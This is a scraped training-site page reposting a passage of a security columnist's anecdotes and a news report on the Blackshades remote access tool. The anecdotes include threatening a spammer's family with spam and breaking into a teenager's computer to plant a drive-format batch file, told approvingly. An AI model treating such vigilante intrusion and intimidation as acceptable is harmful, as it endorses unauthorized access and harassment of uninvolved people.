I used the search engine we all envied at the time, AltaVista, and found not only his personal email account, but those of his wife, daughter, and grandparents. I sent him an email notifying him that every time I received any new spam I would send 100 copies of that spam to his personal email account, as well as those of his wife, his daughter, and his grandparents. Not surprisingly, the new spam suddenly stopped. I even got an email from him notifying me that it might take a day for all spam to stop because he had to remove my name from external lists beyond his control. I never got another spam from him.

I contacted the late, great Ed Foster’s Gripeline column at InfoWorld (many years before I began writing for InfoWorld myself) and told him what I did and how I had found a new way to stop spam that anyone could use. I expected him to congratulate me and make me the focus of one of his columns. Instead, he told me that what I did, or proposed to do, including using the daughter’s email address in my threat, bordered on illegal, or at least ethical, issues. Bless Ed Foster for making me realize I was walking a line I might not want to tread.

True tale of (mostly) white-hat hacking No. 3: Red-herring sting nabs nefarious fishmonger
Years ago I was hired by the CEO of a small fish-selling business. He had a hunch that a former senior executive had hacked his company to get a competitive edge in fish sales to Egypt. A new company, started by the former VP, was suddenly and consistently beating his bid proposals by 1 cent per pound — just enough to ensure that my client’s company went from getting every fish delivery project to getting none. The fishmonger was near bankruptcy when he hired me.

I was a little skeptical of his allegations of computer hacking during our initial visit, but while I was there something odd happened. An Egyptian contact, to whom the CEO had sent bid responses, had received an automatic notice of an email being opened (a read receipt) from an unknown email account in response to an email he had sent my client. The read receipt should have originated from the CEO’s email account, but instead it came from a university email account. It looked like, and was later confirmed, that the hacker had forgotten to turn off automated read receipts in his email client, and when he opened email intended to the CEO, his email client sent back a read receipt from his email account.

We quickly figured out that the former VP had discovered the CEO’s email password and was using it to pick up copies of bid information between his former company and Egypt. The newly discovered email address linked back to a nearby university, which, coincidentally, both the former VP and I had attended years ago. The school allowed former students to continue to use limited parts of its computer system, including email. Antiquated by today’s standards, the university’s system had a few interesting features that proved useful in our investigation: You could look up when other people were using the system, and it would let you link email addresses to real names, along with other identifying information.

We contacted the FBI and city police to report the cyber crime. At the time, the FBI had very few computer crime experts, none with real hacking skills. But with their legal assistance, I was allowed to perform, under the FBI’s legal authority, some limited forensic investigative techniques.

Sure enough, the hacker was using a university email account that we could trace to the former VP. Using various lookups, we were able to see when the former employee used the university system. The correlation to days when fish bidding was performed was striking.

Of course, we could not conclusively confirm that the former VP was using his old email account, no matter how obvious it seemed. We needed a way to track an opened email back to the former VP’s current IP address, which could then be subpoenaed from his ISP. I decided to use a Web beacon.

A Web beacon (aka a Web bug) is a hidden HTML link to a nearly invisible graphic element that when viewed in an HTML-enabled client allows the custodian of that element to track information about the user who has opened it. I modified the CEO’s email signature to contain an HTML link to a 1-pixel transparent GIF file located on a Web server that we managed. When anyone opened an email containing the CEO’s modified signature, their email client would automatically download the Web beacon, and our Web server logs would contain the viewer’s current IP address, along with time, date, and other identifying information.

With our trap in place, we set up a sting. We contacted our Egyptian friend via phone to notify him of our plans. We sent an email discussing a nonexistent bid, along with our Web beacon. Further, we made a bid price that was several orders of magnitude higher than either party normally negotiated and used a fish type that did not exist. Everything about this email screamed fake, if you took the time to research it.

Immediately after we sent the email, the former VP took the bait, sending a bid to our Egyptian exactly 1 cent lower than our extremely high price. I was also able to produce evidence that the former VP accessed the university email system just prior to his response to the fake bid, and our Web beacon worked as planned. We had his IP address, which tracked him to his home. We knew it was his company; we knew it was him; we knew he had been illegally reading emails.

It was an open-and-shut case, although it took years to wind its way through multiple court hearings. Years after the hacking event, I learned that the CEO never changed his email password, proving once again that I understand computers way better than humans.

True tale of (mostly) white-hat hacking No. 4: Hacking comeuppance
I’ve been actively fighting malicious hackers for three decades and have been hacked only twice — once, because I knowingly ran an early computer virus on my system but had forget to set up a safe “jail” before executing it.

The second time, a hacker had sent malicious emails to my InfoWorld address in an attempt to take over my computer. I usually investigate these infrequent occurrences if only to see whether the attack is unique or unusual. In this particular case, the hacker had sent me a GIF file, which took advantage of a brand-new zero-day exploit that buffer-overflowed a Microsoft Windows graphics handling file and gave the attacker full control of my system.

I was getting ready to head on vacation, after a few hours of sleep, and was in such a hurry that I didn’t take the time to open the email in a virtual environment, like I normally would with an email I knew to be malicious. I also couldn’t believe that the attached GIF file could buffer-overflow my system. Many hackers have claimed the ability to do this for nearly two decades, but up until that email, it had never been accomplished in the wild. I was overly confident, perhaps a little cocky, that this malicious graphics file would be like the rest — harmless.

I was wrong. Immediately upon executing it, I could see it implant a backdoor Trojan and dial home. It took me by surprise. After hitting myself in the head a few times for executing a known malicious file on my personal computer, I disconnected from the Internet and immediately began defanging the newly dropped Trojan.

Within a few hours, I had successfully tracked and documented the new vulnerability. I sent a copy off to Microsoft and a few of my antivirus friends for more analysis and response. I lost any chance of getting any sleep before my vacation, and I remember driving way more tired than I should have.

The incident didn’t end there. I contacted the originator of the email and gave him some ill-achieved props. I had noticed he was bragging about his exploit on an IRC hacker channel and spreading his creation to dozens of websites. I told him that Microsoft was working on a fix and all the AV companies were releasing signatures. Needless to say, he wasn’t happy.

He then tried to hack my personal computer network, having acquired the IP address from his initial backdoor Trojan. He launched every malicious attack anyone could think of at the time, including DDoS attacks. When he couldn’t break into my network, he began attacking people and companies I did business with, using my IP address. For example, the hacker was successful in getting Apple to ban my IP address from connecting to its networks, preventing me from picking up new music from iTunes. No amount of emails with Apple would fix the problem, and eventually I was forced to get another IP address from my ISP.

I investigated the hacker, reading emails he had posted in a few hacker forums and on legitimate websites. What I found was that he was an overly zealous high school kid in the Midwest who thought he was a better hacker than he really was. Even “his” zero day was created by someone else. He just passed it along and claimed credit.

After a few more weeks of computer attacks, I sent him an email asking him to stop. He was surprised I had his email address. I responded with his real name, high school, and mailing address. I politely asked that he stop hacking me. He responded by launching even more attacks and attacking more companies using my new IP address. He was getting annoying. It was time to turn the tables.

I figured out what firewall he used to protect himself. I remembered having seen that it had recently had a remote buffer overflow announced in a public forum. This next step probably isn’t legal, but I used the buffer overflow to break into his computer. I created a batch file with commands that would format his hard drive the next time he rebooted, except I remarked out (REM’d) the lines so they would not take affect. I then sent him an email and told him of this “kill” batch file that I had placed on his local hard drive.

He was stunned. I told him that there were lots of smart hackers in this world and he wasn’t the only one who knew how to get onto other people’s system. I then politely asked that he stop attacking not only my system, but anyone’s system, and to turn his curiosity into legal ends. He agreed. As far as I know, he didn’t do any illegal hacking anymore.

Afterward, I got emails and IM chat messages from him for years. He went to college, got an engineering degree, and eventually became a midlevel executive at a computer company that got swallowed up by a huge conglomerate. He became fairly rich in the process. He has a wife and a few kids now. I don’t know if anyone in his life knows about his hacking teenage years. I can only tell you that it appears one good scare helped turned his life around.

True tale of (mostly) white-hat hacking No. 5: Like spies to a honeypot
I had been hired to help implement honeypots. The client, a defense contractor and think tank, had been thoroughly compromised and wanted an early-warning system to detect malicious hackers or insiders and to catch any unknown malware roaming around its network.

Over the next few weeks we created a “honeynet” of early-warning systems, fake Web servers, SQL servers, and SharePoint servers. During any honeypot project, I’m often asked how we’ll attract attackers to the honeypots. I always respond that there is no need to advertise; the attackers will find them. This statement is always met with skepticism, but it’s held true over the years.

We fired up the honeypots, and sure enough, we immediately discovered malware that had not previously been detected. Better yet, within 24 hours we discovered that an internal employee was also roving around the network and hacking various systems. She was trying to break into the new fake servers, including the Web, SQL, and SharePoint servers.

We weren’t sure what type of content the overly zealous employee was looking for or what her intent was, so we created a few different content areas. One dealt with a popular game, which half the users on the IT team seemed interested in. They were going so far as to hack into underutilized servers to host games and use resources. We also created sites centered on Middle East politics (the think tank’s focus) and the space shuttle. We downloaded the content from publicly available websites, copied it to folders, directories, and databases that made it appear as if the information was top secret, and used wget to keep the information updated.

The internal intruder went for the serious stuff. She wasn’t interested in gaming. We tracked her to an accounting/payroll department — by coincidence, literally on the other side of the wall from our honeynet team. The accounting department already had a Web camera in the room for payroll security issues.

With it, we watched the employee, a Russian temp, hack several real systems over the remaining week. Examining her computer after she left for the day, we found that she had inserted a wireless network card and had successfully bridged the “air-gapped” secure and nonsecure network. We could tell she was transmitting the data from her computer to someone else hooked into the wireless network. We placed keylogging programs on her computer to record her every keystroke.

We purchased a wireless sniffer to better track the hacker, and when she began transmitting information, we roamed the hallways looking for the illicit partner. We ended up in a nearby conference room that was open to the public. We opened the doors and saw about 200 people, half of them carrying laptops. Try as we might, we could not track the illegal data stream to a particular person. We had a room and a MAC address. Senior leadership would not allow us to stop everyone in the room to locate the specific person. Although I didn’t like the decision, it probably was the best legal answer.

It was decided that we would detain the known perpetrator to stop the data loss. I hung out in the background as IT and physical security confronted the employee. The moment the security guards entered the accounting department, the temp pushed away from her PC and claimed that someone was hacking it. She was so adamant and tearful that if I had not watched her expert hacking over the past few days using the Web camera, I would have believed her. She was a wonderful actress.

I never heard whether she was arrested or deported or what happened to her. I was not privy to those details. But I did hear that she was just one employee from a newly engaged temporary placement agency, and all the other employees from the agency were also caught hacking at this same client. The young woman I had helped detain had claimed that she had so few computer skills that the company had sent her to basic keyboarding classes.

It remains the one time in my life where I helped catch a Russian spy.

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at



The security vendor has seen an uptick in infections as well as command-and-control servers

Cybercriminals are increasingly using the “Blackshades” malware program whose source code was leaked three years ago, according to an analysis by Symantec.

Blackshades, which Symantec identifies as “W32.Shadesrat,” has been infecting more Microsoft Windows computers and is being controlled by hundreds of command-and-control servers worldwide, which deliver instructions and receive information, wrote Santiago Cortes, a security response engineer at Symantec, in a blog post.

Blackshades is a remote access tool (RAT) that collects usernames and passwords for email and Web services, instant messaging applications, FTP clients and more. It has been sold on underground forums since at least 2010.

It’s common for hackers to use remote access tools, which can be used to upload other malware to a computer or manipulate files. To avoid antivirus software, the programs are often frequently modified.

Lithuania and the U.S. have the highest number of command-and-control servers, Cortes wrote. Nearly all of those servers at one point have hosted exploit kits, a kind of booby trap that delivers malware to computers with software vulnerabilities.

India, the U.S. and the U.K. have the most computers infected with Blackshades, Cortes wrote.

“The distribution of the threats suggests that the attackers attempted to infect as many computers as possible,” Cortes wrote. “The attackers do not seem to have targeted specific people or companies.”

Earlier this year, Symantec wrote that a license to use Blackshades costs between US$40 to $100 a year.

Last year, Symantec wrote that Blackshades had been promoted on underground forums by a person going by the nickname “xVisceral.”

In June 2012, the U.S. Attorney’s Office for the Southern District of New York announced the arrest of Michael Hogue in Tucson, Arizona. It alleged he went by the xVisceral nickname and sold RATs. Hogue was arrested with 23 others in a “carding” scheme, which involved trafficking in financial details.

Hogue entered a plea in the case in January, but it did not appear from the court file that he had been sentenced yet. He was charged with conspiracy to commit computer hacking and distribution of malware.

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at

Free MCTS Training - Free MCITP Training - CCNA Training - CCIE Labs - CCNA Certification - MCTS Online Training - MCITP Online Training - Comptia a+ videos - Comptia a+ Video Training - MCTS Training Key - MCITP Training Key - Free Training Courses - Free Certification Courses - MCTS Online Training - MCTS Online Certification - Cisco Certification Training - CCIE LABS Preparation - Cisco CCNA Training - Cisco CCNA Certification Key - MCITP Videos Training - Free MCITP Videos Tutorial - Free MCTS Video Training - MCTS Videos Tutorial - Free Comptia Online Training - Free Comptia Online Certification

Microsoft MCTS Certification - Microsoft MCITP Training - Comptia A+ Training - Comptia A+ Certification - Cisco CCNA Training - Cisco CCNA Certification - Cisco CCIE Training - Cisco CCIE Exams - Cisco CCNA Training - Comptia A+ Training - Microsoft MCTS Training - MCTS Certification - MCITP Certification